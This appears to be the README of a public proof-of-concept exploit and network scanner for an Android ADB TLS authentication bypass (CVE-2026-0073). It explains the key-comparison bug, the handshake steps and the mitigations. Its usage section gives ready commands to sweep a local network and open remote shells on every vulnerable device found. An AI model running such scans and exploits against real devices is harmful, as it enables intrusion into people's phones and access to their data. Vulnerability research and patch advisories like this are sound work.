Share
## https://sploitus.com/exploit?id=8462108F-033B-511B-8431-30E69787A891
# CVE-2026-0073 โ€” Android ADB TLS Authentication Bypass

A proof-of-concept exploit and network scanner for **CVE-2026-0073**, a critical
zero-click, no-interaction remote code execution vulnerability in Android `adbd`'s
ADB-over-TCP authentication path.

The vulnerability is a logic bug in `adbd_tls_verify_cert()` (`daemon/auth.cpp`)
where `EVP_PKEY_cmp()` is treated as a boolean predicate. When a stored RSA key
is compared against a non-RSA TLS client certificate (EC P-256 or Ed25519), the
API returns `-1` (type mismatch), which is *truthy* in C/C++. This promotes a
cross-algorithm mismatch into a successful host-key match โ€” bypassing
authentication entirely.

**Technical details obtained  from [BARGHEST](https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass).**  
**Base PoC code sourced from [SecTestAnnaQuinn](https://github.com/SecTestAnnaQuinn/CVE-2026-0073-Android-adbd-authentication-bypass-POC).**  
**Patched in Android Security Bulletin โ€” May 2026.**

---

## Impact

| Attribute | Detail |
|-----------|--------|
| **Attack vector** | Network (adjacent / proximal) |
| **Interaction** | None (zero-click) |
| **Privilege obtained** | `shell` user (uid=2000), SELinux `u:r:shell:s0` |
| **Exploit primitive** | Remote shell access via ADB |
| **CVSS** | Critical (9.8) |

From the `shell` context an attacker can inspect system properties, process
state, logs, notifications; install and remove packages; use `run-as` against
debuggable applications; and stage follow-on exploitation.

---

## Files

| File | Purpose |
|------|---------|
| `adb_tls_auth_bypass.py` | Single-target exploit PoC (original by SecTestAnnaQuinn, checksum-patched) |
| `adbt_scanner.py` | Network scanner โ€” discover vulnerable devices + exploit them |
| `requirements.txt` | Python dependencies |

---

## Prerequisites (target device)

For the exploit to succeed, the target Android device must have:

1. **Developer options** enabled
2. **Wireless debugging** or ADB-over-TCP enabled (the platform `adbd` TCP service)
3. At least **one previously paired RSA host key** in `/data/misc/adb/adb_keys`
4. **Network reachability** to the ADB TCP port (default 5555)

---

## Setup

```bash
# Create virtual environment
uv venv

# Activate it
source .venv/bin/activate

# Install dependencies
uv pip install -r requirements.txt
```

**Dependencies:**

| Package | Used by | Required? |
|---------|---------|-----------|
| `cryptography` | Both scripts (EC cert generation, TLS) | **Yes** |
| `netifaces` | Scanner (subnet detection) | Preferred |
| `zeroconf` | Scanner (mDNS discovery) | Preferred |
| `scapy` | Scanner (ARP sweep) | Preferred |

The scanner degrades gracefully when optional packages are missing โ€” it will
warn and fall back to alternative methods (system `ip` command, `nmap`, TCP
connect scan).

---

## Usage

### Mode 0 โ€” Direct single-target exploit

Attack a known vulnerable device directly.

```bash
python3 adb_tls_auth_bypass.py 192.168.1.42              # interactive shell
python3 adb_tls_auth_bypass.py 192.168.1.42 5555 --cmd "id"
```

Or via the scanner:

```bash
python3 adbt_scanner.py --host 192.168.1.42                # interactive shell
python3 adbt_scanner.py --host 192.168.1.42 --cmd "id; getprop ro.product.model"
python3 adbt_scanner.py --host 192.168.1.42 --port 5580 --cmd "whoami"
```

### Mode 1 โ€” Scan network, identify, exploit

Scan the local network for vulnerable devices and exploit all confirmed targets.

```bash
# Full scan: mDNS โ†’ ARP โ†’ port scan โ†’ ADB probe โ†’ exploit
python3 adbt_scanner.py --scan

# Run a specific command on all vulnerable devices
python3 adbt_scanner.py --scan --cmd "id; getprop ro.build.version.security_patch"

# Recon only โ€” discover but don't exploit
python3 adbt_scanner.py --scan --no-exploit

# Scan multiple ports
python3 adbt_scanner.py --scan --ports 5555,5580,5037

# Override detected subnet (multi-homed hosts, specific ranges)
python3 adbt_scanner.py --scan --subnet 192.168.2.0/24

# Tune timeouts for slow networks
python3 adbt_scanner.py --scan --connect-timeout 5 --probe-timeout 10

# Extend mDNS listen window
python3 adbt_scanner.py --scan --mdns-timeout 60

# Skip specific discovery phases
python3 adbt_scanner.py --scan --no-mdns    # skip mDNS, ARP only
python3 adbt_scanner.py --scan --no-arp     # skip ARP, mDNS only
```

### Scanner CLI reference

```
--scan                    Scan network for vulnerable devices + exploit
--host HOST               Direct single-target exploit
--port PORT               ADB port for --host mode (default: 5555)
--cmd COMMAND             Shell command to run
-v, --verbose             Verbose logging

--mdns-timeout SECONDS    mDNS listen duration (default: 30)
--ports PORTS             Comma-separated ports in --scan mode (default: 5555)
--subnet CIDR             Override detected subnet (e.g. 192.168.2.0/24)
--connect-timeout SECONDS TCP connect timeout (default: 2.0)
--probe-timeout SECONDS   ADB probe timeout (default: 3.0)
--arp-timeout SECONDS     ARP sweep timeout (default: 3)
--no-mdns                 Skip mDNS discovery
--no-arp                  Skip ARP sweep + port scan
--no-exploit              Stop after ADB protocol probe phase
```

### Discovery pipeline

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ 1. Subnet detection  โ€” netifaces โ†’ ip route โ†’ socket trick โ”‚
โ”‚ 2. mDNS listener     โ€” _adb-tls-connect._tcp (30s default) โ”‚
โ”‚ 3. ARP sweep         โ€” scapy.arping โ†’ nmap -sn             โ”‚
โ”‚ 4. Port scan         โ€” TCP connect to each host:port       โ”‚
โ”‚ 5. ADB protocol probe โ€” send CNXN, classify response       โ”‚
โ”‚                                                             โ”‚
โ”‚    STLS   โ†’ VULNERABLE (proceed to exploit)                 โ”‚
โ”‚    AUTH   โ†’ legacy ADB auth (not this CVE)                 โ”‚
โ”‚    CNXN   โ†’ open, no auth (already accessible)             โ”‚
โ”‚    NO_ADB โ†’ not an ADB service                             โ”‚
โ”‚                                                             โ”‚
โ”‚ 6. Exploitation      โ€” TLS upgrade โ†’ auth bypass โ†’ shell   โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

mDNS is the most accurate identification method: when wireless debugging is
paired, Android broadcasts `_adb-tls-connect._tcp` explicitly. ARP sweep +
port scan serves as a catch-all fallback.

---

## Exploit mechanics

```
Phase 1 โ€” cleartext ADB
  Client โ†’ CNXN(payload="host::features=...")
  Device โ†’ STLS  (upgrade to TLS required)

Phase 2 โ€” TLS 1.3 with cross-algorithm client cert
  Client โ†’ STLS reply
  Client โ†’ TLS 1.3 handshake + EC P-256 client certificate
  Device calls adbd_tls_verify_cert():
    known_evp = RSA key from /data/misc/adb/adb_keys
    evp_pkey  = EC P-256 key from client certificate
    EVP_PKEY_cmp(known_evp, evp_pkey) โ†’ -1 (type mismatch)
    if (-1) โ†’ verified = true   โ† BUG: -1 is truthy

Phase 3 โ€” Post-TLS ADB service layer
  Client drains device CNXN (transport already online)
  No host CNXN sent (would trigger handle_new_connection kick)
  Client โ†’ OPEN(local_id, window=32MB, payload="shell:\x00")
  Device โ†’ OKAY  โ†’ shell stream established
```

---

## Threat model

### Direct network exposure
- Wireless debugging left enabled on an untrusted network (coffee shop, office,
  conference)
- Internet-exposed ADB on port 5555 (over 10,000 devices observed in Korea alone
  during exposure research)

### Malware-assisted state creation
- On-device malware uses Accessibility Service to enable Developer options,
  activate wireless debugging, and pair a host key โ€” priming the device for
  remote exploitation by a network peer

---

## Limitations

- **Not root.** The exploit provides a `shell` (uid=2000) context. Kernel
  compromise, root access, and hardware-backed keystore keys require additional
  elevation.
- **Requires a paired key.** The target must have at least one RSA host key in
  `/data/misc/adb/adb_keys`. A freshly reset device with wireless debugging
  enabled but *never paired* is not vulnerable.
- **Requires STLS path.** Devices serving ADB over TCP via legacy (non-TLS)
  mechanisms respond with `AUTH`, not `STLS`, and are not affected by this CVE.
- **Patched devices are immune.** The May 2026 Android Security Bulletin
  includes a fix that changes the `EVP_PKEY_cmp` check to require an exact
  `== 1` return value.

---

## Mitigation

- Apply the **Patch**.
- Disable Developer options when not actively needed.
- Disable wireless debugging.
- Do not expose ADB beyond your local trusted network.

---

## References

- [Android Security Bulletin โ€” May 2026](https://source.android.com/docs/security/bulletin/2026/2026-05-01)
- [Technical Analysis by BARGHEST](https://barghest.asia/blog/cve-2026-0073/)
- [Android Acknowledgements](https://source.android.com/docs/security/overview/acknowledgements)
- [BoringSSL commit โ€” EVP_PKEY_cmp return value normalization](https://boringssl.googlesource.com/boringssl/+/3975388935512ea017024973924cfaf06f5b7822)
- [Morpheus spyware report โ€” Osservatorio Nessuno](https://osservatorionessuno.org/blog/2026/04/morpheus-a-new-spyware-linked-to-ips-intelligence/)
- [MESH โ€” BARGHEST's Android security tool](https://github.com/BARGHEST-ngo/MESH)

---

## Disclaimer

This software is provided for **educational and authorized security research
purposes only**. The tools and code in this repository are intended to help
security professionals, researchers, and device owners:

- Understand how CVE-2026-0073 works at a protocol level
- Audit and assess their own devices and networks
- Develop and test mitigations

**You must not use this software:**

- Against any device or network you do not own or have explicit written
  permission to test
- For any unlawful purpose or in violation of applicable laws
- To access, modify, or exfiltrate data without authorization

Unauthorized access to computer systems is illegal in most jurisdictions and
may result in criminal and civil penalties. The authors and contributors
assume **no liability** for misuse, damage, or legal consequences arising from
the use of this software.

**Use responsibly. Know your target. Obtain permission.**

---

## License

[CC0 1.0 Universal](https://creativecommons.org/publicdomain/zero/1.0/) โ€” No Rights Reserved.

To the extent possible under law, the authors have waived all copyright and
related or neighboring rights to this work.